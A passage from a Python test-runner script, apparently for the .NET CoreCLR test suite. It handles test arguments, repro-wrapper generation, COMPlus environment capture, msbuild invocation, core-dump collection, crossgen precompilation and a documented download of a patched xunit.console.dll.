parser.add_argument("--gcsimulator", dest="gcsimulator", action="store_true", default=False)
parser.add_argument("--ilasmroundtrip", dest="ilasmroundtrip", action="store_true", default=False)
parser.add_argument("--run_crossgen_tests", dest="run_crossgen_tests", action="store_true", default=False)
parser.add_argument("--run_crossgen2_tests", dest="run_crossgen2_tests", action="store_true", default=False)
parser.add_argument("--large_version_bubble", dest="large_version_bubble", action="store_true", default=False)
parser.add_argument("--precompile_core_root", dest="precompile_core_root", action="store_true", default=False)
parser.add_argument("--skip_test_run", dest="skip_test_run", action="store_true", default=False, help="Does not run tests. Useful in conjunction with --precompile_core_root")
parser.add_argument("--sequential", dest="sequential", action="store_true", default=False)
parser.add_argument("--analyze_results_only", dest="analyze_results_only", action="store_true", default=False)
parser.add_argument("--verbose", dest="verbose", action="store_true", default=False)
parser.add_argument("--limited_core_dumps", dest="limited_core_dumps", action="store_true", default=False)
parser.add_argument("--run_in_context", dest="run_in_context", action="store_true", default=False)
# Only used on Unix
parser.add_argument("-test_native_bin_location", dest="test_native_bin_location", nargs='?', default=None)
################################################################################
# Globals
################################################################################
g_verbose = False
gc_stress = False
coredump_pattern = ""
file_name_cache = defaultdict(lambda: None)
################################################################################
# Classes
################################################################################
class TempFile:
def __init__(self, extension):
self.file = None
self.file_name = None
self.extension = extension
def __enter__(self):
self.file = tempfile.NamedTemporaryFile(delete=False, suffix=self.extension)
self.file_name = self.file.name
return self.file_name
def __exit__(self, exc_type, exc_val, exc_tb):
try:
os.remove(self.file_name)
except:
print("Error failed to delete: {}.".format(self.file_name))
class DebugEnv:
def __init__(self,
args,
env,
test):
""" Go through the failing tests and create repros for them
Args:
args
env : env for the repro
test ({}) : The test metadata
"""
self.unique_name = "%s_%s_%s_%s" % (test["name"],
args.host_os,
args.arch,
args.build_type)
self.args = args
self.env = env
self.test = test
self.test_location = test["test_path"]
self.__create_repro_wrapper__()
self.path = None
if self.args.host_os == "windows":
self.path = self.unique_name + ".cmd"
else:
self.path = self.unique_name + ".sh"
repro_location = os.path.join(self.args.artifacts_location, "repro", "%s.%s.%s" % (self.args.host_os, self.args.arch, self.args.build_type))
assert os.path.isdir(repro_location)
self.repro_location = repro_location
self.path = os.path.join(repro_location, self.path)
exe_location = os.path.splitext(self.test_location)[0] + ".exe"
if os.path.isfile(exe_location):
self.exe_location = exe_location
self.__add_configuration_to_launch_json__()
def __add_configuration_to_launch_json__(self):
""" Add to or create a launch.json with debug information for the test
Notes:
This will allow debugging using the cpp extension in vscode.
"""
repro_location = self.repro_location
assert os.path.isdir(repro_location)
vscode_dir = os.path.join(repro_location, ".vscode")
if not os.path.isdir(vscode_dir):
os.mkdir(vscode_dir)
assert os.path.isdir(vscode_dir)
launch_json_location = os.path.join(vscode_dir, "launch.json")
if not os.path.isfile(launch_json_location):
initial_json = {
"version": "0.2.0",
"configurations": []
}
json_str = json.dumps(initial_json,
indent=4,
separators=(',', ': '))
with open(launch_json_location, 'w') as file_handle:
file_handle.write(json_str)
launch_json = None
with open(launch_json_location) as file_handle:
launch_json = file_handle.read()
launch_json = json.loads(launch_json)
configurations = launch_json["configurations"]
dbg_type = "cppvsdbg" if self.host_os == "windows" else ""
env = {
"COMPlus_AssertOnNYI": "1",
"COMPlus_ContinueOnAssert": "0"
}
if self.env is not None:
# Convert self.env to a defaultdict
self.env = defaultdict(lambda: None, self.env)
for key, value in env.items():
self.env[key] = value
else:
self.env = env
environment = []
for key, value in self.env.items():
env = {
"name": key,
"value": value
}
environment.append(env)
configuration = defaultdict(lambda: None, {
"name": self.unique_name,
"type": dbg_type,
"request": "launch",
"program": self.args.corerun_path,
"args": [self.exe_location],
"stopAtEntry": False,
"cwd": os.path.join("${workspaceFolder}", "..", ".."),
"environment": environment,
"externalConsole": True
})
if self.args.build_type.lower() != "release":
symbol_path = os.path.join(self.args.core_root, "PDB")
configuration["symbolSearchPath"] = symbol_path
# Update configuration if it already exists.
config_exists = False
for index, config in enumerate(configurations):
if config["name"] == self.unique_name:
configurations[index] = configuration
config_exists = True
if not config_exists:
configurations.append(configuration)
json_str = json.dumps(launch_json,
indent=4,
separators=(',', ': '))
with open(launch_json_location, 'w') as file_handle:
file_handle.write(json_str)
def __create_repro_wrapper__(self):
""" Create the repro wrapper
"""
if self.args.host_os == "windows":
self.__create_batch_wrapper__()
else:
self.__create_bash_wrapper__()
def __create_batch_wrapper__(self):
""" Create a windows batch wrapper
"""
wrapper = \
"""@echo off
REM ============================================================================
REM Repro environment for %s
REM
REM Notes:
REM
REM This wrapper is automatically generated by run.py. It includes the
REM necessary environment to reproduce a failure that occured during running
REM the tests.
REM
REM In order to change how this wrapper is generated, see
REM run.py:__create_batch_wrapper__(). Please note that it is possible
REM to recreate this file by running src/tests/run.py --analyze_results_only
REM with the appropriate environment set and the correct arch and build_type
REM passed.
REM
REM ============================================================================
REM Set Core_Root if it has not been already set.
if "%%CORE_ROOT%%"=="" set CORE_ROOT=%s
echo Core_Root is set to: "%%CORE_ROOT%%"
""" % (self.unique_name, self.args.core_root)
line_sep = os.linesep
if self.env is not None:
for key, value in self.env.items():
wrapper += "echo set %s=%s%s" % (key, value, line_sep)
wrapper += "set %s=%s%s" % (key, value, line_sep)
wrapper += "%s" % line_sep
wrapper += "echo call %s%s" % (self.test_location, line_sep)
wrapper += "call %s%s" % (self.test_location, line_sep)
self.wrapper = wrapper
def __create_bash_wrapper__(self):
""" Create a unix bash wrapper
"""
wrapper = \
"""
#============================================================================
# Repro environment for %s
#
# Notes:
#
# This wrapper is automatically generated by run.py. It includes the
# necessary environment to reproduce a failure that occured during running
# the tests.
#
# In order to change how this wrapper is generated, see
# run.py:__create_bash_wrapper__(). Please note that it is possible
# to recreate this file by running src/tests/run.py --analyze_results_only
# with the appropriate environment set and the correct arch and build_type
# passed.
#
# ============================================================================
# Set Core_Root if it has not been already set.
if [ \"${CORE_ROOT}\" = \"\" ] || [ ! -z \"${CORE_ROOT}\" ]; then
export CORE_ROOT=%s
else
echo \"CORE_ROOT set to ${CORE_ROOT}\"
fi
""" % (self.unique_name, self.core_root)
line_sep = os.linesep
if self.env is not None:
for key, value in self.env.items():
wrapper += "echo export %s=%s%s" % (key, value, line_sep)
wrapper += "export %s=%s%s" % (key, value, line_sep)
wrapper += "%s" % line_sep
wrapper += "echo bash %s%s" % (self.test_location, line_sep)
wrapper += "bash %s%s" % (self.test_location, line_sep)
self.wrapper = wrapper
def write_repro(self):
""" Write out the wrapper
Notes:
This will check if the wrapper repros or not. If it does not repro
it will be put into an "unstable" folder under artifacts/repro.
Else it will just be written out.
"""
with open(self.path, 'w') as file_handle:
file_handle.write(self.wrapper)
################################################################################
# Helper Functions
################################################################################
def create_and_use_test_env(_os, env, func):
""" Create a test env based on the env passed
Args:
_os(str) : OS name
env(defaultdict(lambda: None)) : complus variables, key,value dict
func(lambda) : lambda to call, after creating the
: test_env
Notes:
Using the env passed, create a temporary file to use as the
test_env to be passed for run.cmd. Note that this only happens
on windows, until xunit is used on unix there is no managed code run
in run.sh.
"""
global gc_stress
ret_code = 0
complus_vars = defaultdict(lambda: None)
for key in env:
value = env[key]
if "complus" in key.lower() or "superpmi" in key.lower():
complus_vars[key] = value
if len(list(complus_vars.keys())) > 0:
print("Found COMPlus variables in the current environment")
print("")
contents = ""
# We can't use:
#
# with tempfile.NamedTemporaryFile() as test_env:
# ...
# return func(...)
#
# because on Windows Python locks the file, and trying to use it give you:
#
# The process cannot access the file because it is being used by another process.
#
# errors.
tempfile_suffix = ".bat" if _os == "windows" else ""
test_env = tempfile.NamedTemporaryFile(mode="w", suffix=tempfile_suffix, delete=False)
try:
file_header = None
if _os == "windows":
file_header = \
"""@REM Temporary test env for test run.
@echo on
"""
else:
file_header = \
"""# Temporary test env for test run.
"""
test_env.write(file_header)
contents += file_header
for key in complus_vars:
value = complus_vars[key]
command = None
if _os == "windows":
command = "set"
else:
command = "export"
if key.lower() == "complus_gcstress":
gc_stress = True
print("Unset %s" % key)
os.environ[key] = ""
# \n below gets converted to \r\n on Windows because the file is opened in text (not binary) mode
line = "%s %s=%s\n" % (command, key, value)
test_env.write(line)
contents += line
if _os == "windows":
file_suffix = \
"""@echo off
"""
test_env.write(file_suffix)
contents += file_suffix
test_env.close()
print("")
print("TestEnv: %s" % test_env.name)
print("")
print("Contents:")
print("")
print(contents)
print("")
ret_code = func(test_env.name)
finally:
os.remove(test_env.name)
else:
ret_code = func(None)
return ret_code
def get_environment(test_env=None):
""" Get all the COMPlus_* Environment variables
Notes:
All COMPlus variables need to be captured as a test_env script to avoid
influencing the test runner.
On Windows, os.environ keys (the environment variable names) are all upper case,
and map lookup is case-insensitive on the key.
"""
global gc_stress
complus_vars = defaultdict(lambda: "")
for key in os.environ:
if "complus" in key.lower():
complus_vars[key] = os.environ[key]
os.environ[key] = ''
elif "superpmi" in key.lower():
complus_vars[key] = os.environ[key]
os.environ[key] = ''
# Get the env from the test_env
if test_env is not None:
with open(test_env) as file_handle:
for item in file_handle.readlines():
key_split = item.split("=")
if len(key_split) == 1:
continue
key = key_split[0]
value = key_split[1]
key = key.split(" ")[-1]
value = value.strip()
try:
value = value.split(" ")[0]
except:
pass
complus_vars[key] = value
# Supoort looking up case insensitive.
complus_vars[key.lower()] = value
if "complus_gcstress" in complus_vars:
gc_stress = True
return complus_vars
def call_msbuild(args):
""" Call msbuild to run the tests built.
Args:
args
Notes:
At this point the environment should be setup correctly, including
the test_env, should it need to be passed.
"""
global g_verbose
common_msbuild_arguments = []
if args.sequential:
common_msbuild_arguments += ["/p:ParallelRun=none"]
if not os.path.isdir(args.logs_dir):
os.makedirs(args.logs_dir)
# Set up the directory for MSBuild debug logs.
msbuild_debug_logs_dir = os.path.join(args.logs_dir, "MsbuildDebugLogs")
if not os.path.isdir(msbuild_debug_logs_dir):
os.makedirs(msbuild_debug_logs_dir)
os.environ["MSBUILDDEBUGPATH"] = msbuild_debug_logs_dir
command = [args.dotnetcli_script_path,
"msbuild",
os.path.join(args.coreclr_tests_src_dir, "run.proj"),
"/p:Runtests=true",
"/clp:showcommandline"]
command += common_msbuild_arguments
if args.il_link:
command += ["/p:RunTestsViaIllink=true"]
if args.limited_core_dumps:
command += ["/p:LimitedCoreDumps=true"]
log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
build_log = log_path + ".log"
wrn_log = log_path + ".wrn"
err_log = log_path + ".err"
command += ["/fileloggerparameters:\"Verbosity=normal;LogFile=%s\"" % build_log,
"/fileloggerparameters1:\"WarningsOnly;LogFile=%s\"" % wrn_log,
"/fileloggerparameters2:\"ErrorsOnly;LogFile=%s\"" % err_log,
"/consoleloggerparameters:Summary"]
if g_verbose:
command += ["/verbosity:diag"]
command += ["/p:TargetOS=%s" % args.host_os,
"/p:TargetArchitecture=%s" % args.arch,
"/p:Configuration=%s" % args.build_type,
"/p:__LogsDir=%s" % args.logs_dir]
command += ["/bl:%s.binlog" % (log_path)]
print(" ".join(command))
sys.stdout.flush() # flush output before creating sub-process
proc = subprocess.Popen(command)
try:
proc.communicate()
except:
proc.kill()
sys.exit(1)
if args.limited_core_dumps:
inspect_and_delete_coredump_files(args.host_os, args.arch, args.test_location)
return proc.returncode
def setup_coredump_generation(host_os):
""" Configures the environment so that the current process and any child
processes can generate coredumps.
Args:
host_os (String) : os
Notes:
This is only support for OSX and Linux, it does nothing on Windows.
This will print a message if setting the rlimit fails but will otherwise
continue execution, as some systems will already be configured correctly
and it is not necessarily a failure to not collect coredumps.
"""
global coredump_pattern
if host_os == "OSX":
coredump_pattern = subprocess.check_output("sysctl -n kern.corefile", shell=True).rstrip()
elif host_os == "Linux":
with open("/proc/sys/kernel/core_pattern", "r") as f:
coredump_pattern = f.read().rstrip()
else:
print("CoreDump generation not enabled due to unsupported OS: %s" % host_os)
return
if isinstance(coredump_pattern, bytes):
print("Binary data found. Decoding.")
coredump_pattern = coredump_pattern.decode('ascii')
print("CoreDump Pattern: {}".format(coredump_pattern))
# resource is only available on Unix platforms
import resource
if coredump_pattern != "core" and coredump_pattern != "core.%P":
print("CoreDump generation not enabled due to unsupported coredump pattern: %s" % coredump_pattern)
return
else:
print("CoreDump pattern: %s" % coredump_pattern)
# We specify 'shell=True' as the command may otherwise fail (some systems will
# complain that the executable cannot be found in the current directory).
rlimit_core = subprocess.check_output("ulimit -c", shell=True).rstrip()
if rlimit_core != "unlimited":
try:
# This can fail on certain platforms. ARM64 in particular gives: "ValueError: not allowed to raise maximum limit"
resource.setrlimit(resource.RLIMIT_CORE, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))
except:
print("Failed to enable CoreDump generation. rlimit_core: %s" % rlimit_core)
return
rlimit_core = subprocess.check_output("ulimit -c", shell=True).rstrip()
if rlimit_core != "unlimited":
print("Failed to enable CoreDump generation. rlimit_core: %s" % rlimit_core)
return
print("CoreDump generation enabled")
if host_os == "Linux" and os.path.isfile("/proc/self/coredump_filter"):
# Include memory in private and shared file-backed mappings in the dump.
# This ensures that we can see disassembly from our shared libraries when
# inspecting the contents of the dump. See 'man core' for details.
with open("/proc/self/coredump_filter", "w") as f:
f.write("0x3F")
def print_info_from_coredump_file(host_os, arch, coredump_name, executable_name):
""" Prints information from the specified coredump to the console
Args:
host_os (String) : os
arch (String) : architecture
coredump_name (String) : name of the coredump to print
executable_name (String) : name of the executable that generated the coredump
Notes:
This is only support for OSX and Linux, it does nothing on Windows.
This defaults to lldb on OSX and gdb on Linux.
For both lldb and db, it backtraces all threads. For gdb, it also prints local
information for every frame. This option is not available as a built-in for lldb.
"""
if not os.path.isfile(executable_name):
print("Not printing coredump due to missing executable: %s" % executable_name)
return
if not os.path.isfile(coredump_name):
print("Not printing coredump due to missing coredump: %s" % coredump_name)
return
command = ""
if host_os == "OSX":
command = "lldb -c %s -b -o 'bt all' -o 'disassemble -b -p'" % coredump_name
elif host_os == "Linux":
command = "gdb --batch -ex \"thread apply all bt full\" -ex \"disassemble /r $pc\" -ex \"quit\" %s %s" % (executable_name, coredump_name)
else:
print("Not printing coredump due to unsupported OS: %s" % host_os)
return
print("Printing info from coredump: %s" % coredump_name)
proc_failed = False
try:
sys.stdout.flush() # flush output before creating sub-process
# We specify 'shell=True' as the command may otherwise fail (some systems will
# complain that the executable cannot be found in the current directory).
proc = subprocess.Popen(command, shell=True)
proc.communicate()
if proc.returncode != 0:
proc_failed = True
except:
proc_failed = True
if proc_failed:
print("Failed to print coredump: %s" % coredump_name)
def preserve_coredump_file(coredump_name, root_storage_location="/tmp/coredumps_coreclr"):
""" Copies the specified coredump to a new randomly named temporary directory under
root_storage_location to ensure it is accessible after the workspace is cleaned.
Args:
coredump_name (String) : name of the coredump to print
root_storage_location (String) : the directory under which to copy coredump_name
Notes:
root_storage_location defaults to a folder under /tmp to ensure that it is cleaned
up on next reboot (or after the OS configured time elapses for the folder).
"""
if not os.path.exists(root_storage_location):
os.mkdir(root_storage_location)
# This creates a temporary directory under `root_storage_location` to ensure it doesn'tag
# conflict with any coredumps from past runs.
storage_location = tempfile.mkdtemp('', '', root_storage_location)
# Only preserve the dump if the directory is empty. Otherwise, do nothing.
# This is a way to prevent us from storing/uploading too many dumps.
if os.path.isfile(coredump_name) and not os.listdir(storage_location):
print("Copying coredump file %s to %s" % (coredump_name, storage_location))
shutil.copy2(coredump_name, storage_location)
def inspect_and_delete_coredump_file(host_os, arch, coredump_name):
""" Prints information from the specified coredump and creates a backup of it
Args:
host_os (String) : os
arch (String) : architecture
coredump_name (String) : name of the coredump to print
"""
print_info_from_coredump_file(host_os, arch, coredump_name, "%s/corerun" % os.environ["CORE_ROOT"])
preserve_coredump_file(coredump_name)
os.remove(coredump_name)
def inspect_and_delete_coredump_files(host_os, arch, test_location):
""" Finds all coredumps under test_location, prints some basic information about them
to the console, and creates a backup of the dumps for further investigation
Args:
host_os (String) : os
arch (String) : architecture
test_location (String) : the folder under which to search for coredumps
"""
# This function prints some basic information from core files in the current
# directory and deletes them immediately.
# Depending on distro/configuration, the core files may either be named "core"
# or "core.<PID>" by default. We will read /proc/sys/kernel/core_uses_pid to
# determine which one it is.
# On OS X/macOS, we checked the kern.corefile value before enabling core dump
# generation, so we know it always includes the PID.
coredump_name_uses_pid=False
print("Looking for coredumps...")
if "%P" in coredump_pattern:
coredump_name_uses_pid=True
elif host_os == "Linux" and os.path.isfile("/proc/sys/kernel/core_uses_pid"):
with open("/proc/sys/kernel/core_uses_pid", "r") as f:
if f.read().rstrip() == "1":
coredump_name_uses_pid=True
filter_pattern = ""
regex_pattern = ""
matched_file_count = 0
if coredump_name_uses_pid:
filter_pattern = "core.*"
regex_pattern = "core.[0-9]+"
else:
filter_pattern = "core"
regex_pattern = "core"
for dir_path, dir_names, file_names in os.walk(test_location):
for file_name in fnmatch.filter(file_names, filter_pattern):
if re.match(regex_pattern, file_name):
print("Found coredump: %s in %s" % (file_name, dir_path))
matched_file_count += 1
inspect_and_delete_coredump_file(host_os, arch, os.path.join(dir_path, file_name))
print("Found %s coredumps." % matched_file_count)
def run_tests(args,
test_env_script_path=None):
""" Run the coreclr tests
Args:
args
test_env_script_path : Path to script to use to set the test environment, if any.
"""
if args.precompile_core_root:
precompile_core_root(args)
if args.skip_test_run:
return
# Set default per-test timeout to 15 minutes (in milliseconds).
per_test_timeout = 15*60*1000
# Setup the environment
if args.long_gc:
print("Running Long GC Tests, extending timeout to 20 minutes.")
per_test_timeout = 20*60*1000
print("Setting RunningLongGCTests=1")
os.environ["RunningLongGCTests"] = "1"
if args.gcsimulator:
print("Running GCSimulator tests, extending timeout to one hour.")
per_test_timeout = 60*60*1000
print("Setting RunningGCSimulatorTests=1")
os.environ["RunningGCSimulatorTests"] = "1"
if args.ilasmroundtrip:
print("Running ILasm round trip.")
print("Setting RunningIlasmRoundTrip=1")
os.environ["RunningIlasmRoundTrip"] = "1"
if args.run_crossgen_tests:
print("Running tests R2R")
print("Setting RunCrossGen=true")
os.environ["RunCrossGen"] = "true"
if args.run_crossgen2_tests:
print("Running tests R2R (Crossgen2)")
print("Setting RunCrossGen2=true")
os.environ["RunCrossGen2"] = "true"
if args.large_version_bubble:
print("Large Version Bubble enabled")
os.environ["LargeVersionBubble"] = "true"
if gc_stress:
print("Running GCStress, extending timeout to 120 minutes.")
per_test_timeout = 120*60*1000
if args.limited_core_dumps:
setup_coredump_generation(args.host_os)
if args.run_in_context:
print("Running test in an unloadable AssemblyLoadContext")
os.environ["CLRCustomTestLauncher"] = args.runincontext_script_path
os.environ["RunInUnloadableContext"] = "1";
per_test_timeout = 20*60*1000
# Set __TestTimeout environment variable, which is the per-test timeout in milliseconds.
# This is read by the test wrapper invoker, in src\coreclr\tests\src\Common\Coreclr.TestWrapper\CoreclrTestWrapperLib.cs.
print("Setting __TestTimeout=%s" % str(per_test_timeout))
os.environ["__TestTimeout"] = str(per_test_timeout)
# Set CORE_ROOT
print("Setting CORE_ROOT=%s" % args.core_root)
os.environ["CORE_ROOT"] = args.core_root
# Set __TestDotNetCmd so tests which need to run dotnet can use the repo-local script on dev boxes
os.environ["__TestDotNetCmd"] = args.dotnetcli_script_path
# Set test env script path if it is set.
if test_env_script_path is not None:
print("Setting __TestEnv=%s" % test_env_script_path)
os.environ["__TestEnv"] = test_env_script_path
#=====================================================================================================================================================
#
# This is a workaround needed to unblock our CI (in particular, Linux/arm and Linux/arm64 jobs) from the following failures appearing almost in every
# pull request (but hard to reproduce locally)
#
# System.IO.FileLoadException: Could not load file or assembly 'Exceptions.Finalization.XUnitWrapper, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'.
# An operation is not legal in the current state. (Exception from HRESULT: 0x80131509 (COR_E_INVALIDOPERATION))
#
# COR_E_INVALIDOPERATION comes from System.InvalidOperationException that is thrown during AssemblyLoadContext.ResolveUsingResolvingEvent
# when multiple threads attempt to modify an instance of Dictionary (managedAssemblyCache) during Xunit.DependencyContextAssemblyCache.LoadManagedDll call.
#
# In order to mitigate the failure we built our own xunit.console.dll with ConcurrentDictionary used for managedAssemblyCache and use this instead of
# the one pulled from NuGet. The exact code that got built can be found at the following fork of Xunit
# * https://github.com/echesakovMSFT/xunit/tree/UseConcurrentDictionaryInDependencyContextAssemblyCache
#
# The assembly was built using Microsoft Visual Studio v15.9.0-pre.4.0 Developer Command Prompt using the following commands
# 1) git clone https://github.com/echesakovMSFT/xunit.git --branch UseConcurrentDictionaryInDependencyContextAssemblyCache --single-branch
# 2) cd xunit
# 3) git submodule update --init
# 4) powershell .\build.ps1 -target packages -buildAssemblyVersion 2.4.1 -buildSemanticVersion 2.4.1-coreclr
#
# Then file "xunit\src\xunit.console\bin\Release\netcoreapp2.0\xunit.console.dll" was archived and uploaded to the clrjit blob storage.
#
# Ideally, this code should be removed when we find a more robust way of running Xunit tests.
#
# References:
# * https://github.com/dotnet/runtime/issues/11232
# * https://github.com/dotnet/runtime/issues/11320
# * https://github.com/xunit/xunit/issues/1842
# * https://github.com/xunit/xunit/pull/1846
#
#=====================================================================================================================================================
print("Download and overwrite xunit.console.dll in Core_Root")
urlretrieve = urllib.urlretrieve if sys.version_info.major < 3 else urllib.request.urlretrieve
zipfilename = os.path.join(tempfile.gettempdir(), "xunit.console.dll.zip")
url = r"https://clrjit.blob.core.windows.net/xunit-console/xunit.console.dll-v2.4.1.zip"
urlretrieve(url, zipfilename)
with zipfile.ZipFile(zipfilename,"r") as ziparch:
ziparch.extractall(os.path.join(args.core_root, "xunit"))
os.remove(zipfilename)
assert not os.path.isfile(zipfilename)
return call_msbuild(args)
def setup_args(args):
""" Setup the args based on the argparser obj
Args:
args(ArgParser): Parsed arguments
Notes:
If there is no core_root, or test location passed, create a default
location using the build type and the arch.
"""
requires_coreroot = args.host_os != "Browser" and args.host_os != "Android"
coreclr_setup_args = CoreclrArguments(args,
require_built_test_dir=True,
require_built_core_root=requires_coreroot,
require_built_product_dir=False)
normal_location = os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type))
# If we have supplied our own test location then we need to create a test location
# that the scripting will expect. As it is now, there is a dependency on the
# test location being under test/<os>.<build_type>.<arch>
# Make sure that we are using the correct build_type. This is a test drop, it is possible
# that we are inferring the build type to be Debug incorrectly.
if coreclr_setup_args.build_type not in coreclr_setup_args.test_location:
# Remove punctuation
corrected_build_type = re.sub("[%s]" % string.punctuation, "", coreclr_setup_args.test_location.split(".")[-1])
coreclr_setup_args.verify(corrected_build_type,
"build_type",
coreclr_setup_args.check_build_type,
"Unsupported configuration: %s.\nSupported configurations: %s" % (corrected_build_type, ", ".join(coreclr_setup_args.valid_build_types)))
if coreclr_setup_args.test_location is not None and coreclr_setup_args.test_location != normal_location:
print("Error, msbuild currently expects tests in {} (got test_location {})".format(normal_location, coreclr_setup_args.test_location))
raise Exception("Error, msbuild currently expects tests in artifacts/tests/...")
coreclr_setup_args.verify(args,
"test_env",
lambda arg: True,
"Error setting test_env")
coreclr_setup_args.verify(args,
"analyze_results_only",
lambda arg: True,
"Error setting analyze_results_only")
coreclr_setup_args.verify(args,
"crossgen_altjit",
lambda arg: True,
"Error setting crossgen_altjit")
coreclr_setup_args.verify(args,
"rid",
lambda arg: True,
"Error setting rid")
coreclr_setup_args.verify(args,
"il_link",
lambda arg: True,
"Error setting il_link")
coreclr_setup_args.verify(args,
"long_gc",
lambda arg: True,
"Error setting long_gc")
coreclr_setup_args.verify(args,
"gcsimulator",
lambda arg: True,
"Error setting gcsimulator")
coreclr_setup_args.verify(args,
"ilasmroundtrip",
lambda arg: True,
"Error setting ilasmroundtrip")
coreclr_setup_args.verify(args,
"large_version_bubble",
lambda arg: True,
"Error setting large_version_bubble")
coreclr_setup_args.verify(args,
"run_crossgen_tests",
lambda arg: True,
"Error setting run_crossgen_tests")
coreclr_setup_args.verify(args,
"run_crossgen2_tests",
lambda unused: True,
"Error setting run_crossgen2_tests")
coreclr_setup_args.verify(args,
"precompile_core_root",
lambda arg: True,
"Error setting precompile_core_root")
coreclr_setup_args.verify(args,
"skip_test_run",
lambda arg: True,
"Error setting skip_test_run")
coreclr_setup_args.verify(args,
"sequential",
lambda arg: True,
"Error setting sequential")
coreclr_setup_args.verify(args,
"verbose",
lambda arg: True,
"Error setting verbose")
coreclr_setup_args.verify(args,
"limited_core_dumps",
lambda arg: True,
"Error setting limited_core_dumps")
coreclr_setup_args.verify(args,
"test_native_bin_location",
lambda arg: True,
"Error setting test_native_bin_location")
coreclr_setup_args.verify(args,
"run_in_context",
lambda arg: True,
"Error setting run_in_context")
is_same_os = False
is_same_arch = False
is_same_build_type = False
# We will write out build information into the test directory. This is used
# by run.py to determine whether we need to rebuild the test wrappers.
if os.path.isfile(os.path.join(coreclr_setup_args.test_location, "build_info.json")):
with open(os.path.join(coreclr_setup_args.test_location, "build_info.json")) as file_handle:
build_info = json.load(file_handle)
is_same_os = build_info["build_os"] == coreclr_setup_args.host_os
is_same_arch = build_info["build_arch"] == coreclr_setup_args.arch
is_same_build_type = build_info["build_type"] == coreclr_setup_args.build_type
if coreclr_setup_args.host_os != "windows" and not (is_same_os and is_same_arch and is_same_build_type):
test_native_bin_location = None
if args.test_native_bin_location is None:
test_native_bin_location = os.path.join(os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "obj", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type)))
else:
test_native_bin_location = args.test_native_bin_location
coreclr_setup_args.verify(test_native_bin_location,
"test_native_bin_location",
lambda test_native_bin_location: os.path.isdir(test_native_bin_location),
"Error setting test_native_bin_location")
else:
setattr(coreclr_setup_args, "test_native_bin_location", None)
print("host_os : %s" % coreclr_setup_args.host_os)
print("arch : %s" % coreclr_setup_args.arch)
print("build_type : %s" % coreclr_setup_args.build_type)
print("runtime_repo_location : %s" % coreclr_setup_args.runtime_repo_location)
print("product_location : %s" % coreclr_setup_args.product_location)
print("core_root : %s" % coreclr_setup_args.core_root)
print("test_location : %s" % coreclr_setup_args.test_location)
print("test_native_bin_location : %s" % coreclr_setup_args.test_native_bin_location)
coreclr_setup_args.crossgen_path = os.path.join(coreclr_setup_args.core_root, "crossgen%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.corerun_path = os.path.join(coreclr_setup_args.core_root, "corerun%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.dotnetcli_script_path = os.path.join(coreclr_setup_args.runtime_repo_location, "dotnet%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.coreclr_tests_dir = os.path.join(coreclr_setup_args.coreclr_dir, "tests")
coreclr_setup_args.coreclr_tests_src_dir = os.path.join(coreclr_setup_args.runtime_repo_location, "src", "tests")
coreclr_setup_args.runincontext_script_path = os.path.join(coreclr_setup_args.coreclr_tests_src_dir, "Common", "scripts", "runincontext%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.logs_dir = os.path.join(coreclr_setup_args.artifacts_location, "log")
return coreclr_setup_args
def precompile_core_root(args):
""" Precompile all of the assemblies in the core_root directory
Args:
args
"""
skip_list = [
".*xunit.*",
".*api-ms-win-core.*",
".*api-ms-win.*",
".*System.Private.CoreLib.*"
]
unix_skip_list = [
".*mscorlib.*",
".*System.Runtime.WindowsRuntime.*",
".*System.Runtime.WindowsRuntime.UI.Xaml.*",
".*R2RDump.dll.*"
]
arm64_unix_skip_list = [
".*Microsoft.CodeAnalysis.VisualBasic.*",
".*System.Net.NameResolution.*",
".*System.Net.Sockets.*",
".*System.Net.Primitives.*"
]
if args.host_os != "windows":
skip_list += unix_skip_list
if args.arch == "arm64":
skip_list += arm64_unix_skip_list
assert os.path.isdir(args.test_location)
assert os.path.isdir(args.core_root)
def call_crossgen(file, env):
assert os.path.isfile(args.crossgen_path)
command = [args.crossgen_path, "/Platform_Assemblies_Paths", args.core_root, file]
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
proc.communicate()
return_code = proc.returncode
if return_code == -2146230517:
print("%s is not a managed assembly." % file)
return False
if return_code != 0:
print("Unable to precompile %s (%d)" % (file, return_code))
return False
print("Successfully precompiled %s" % file)
return True
print("Precompiling all assemblies in %s" % args.core_root)
print("")
env = os.environ.copy()
if not args.crossgen_altjit is None:
env["COMPlus_AltJit"]="*"
env["COMPlus_AltJitNgen"]="*"
env["COMPlus_AltJitName"]=args.crossgen_altjit
env["COMPlus_AltJitAssertOnNYI"]="1"
env["COMPlus_NoGuiOnAssert"]="1"
env["COMPlus_ContinueOnAssert"]="0"
dlls = [os.path.join(args.core_root, item) for item in os.listdir(args.core_root) if item.endswith("dll") and "mscorlib" not in item]
def in_skip_list(item):
found = False
for skip_re in skip_list:
if re.match(skip_re, item.lower()) is not None:
found = True
return found
dlls = [dll for dll in dlls if not in_skip_list(dll)]
for dll in dlls:
call_crossgen(dll, env)
print("")
if sys.version_info.major < 3:
def to_unicode(s):
return unicode(s, "utf-8")
else:
def to_unicode(s):
return s
def find_test_from_name(host_os, test_location, test_name):
""" Given a test's name return the location on disk
Args:
host_os (str) : os
test_location (str) :path to the coreclr tests
test_name (str) : Name of the test, all special characters will have
: been replaced with underscores.
Return:
test_path (str): Path of the test based on its name
"""
location = test_name
# Lambdas and helpers
is_file_or_dir = lambda path : os.path.isdir(path) or os.path.isfile(path)
def match_filename(test_path):
# Scan through the test directory looking for a similar
# file
global file_name_cache
if not os.path.isdir(os.path.dirname(test_path)):
pass
assert os.path.isdir(os.path.dirname(test_path))
size_of_largest_name_file = 0
dir_contents = file_name_cache[os.path.dirname(test_path)]
if dir_contents is None:
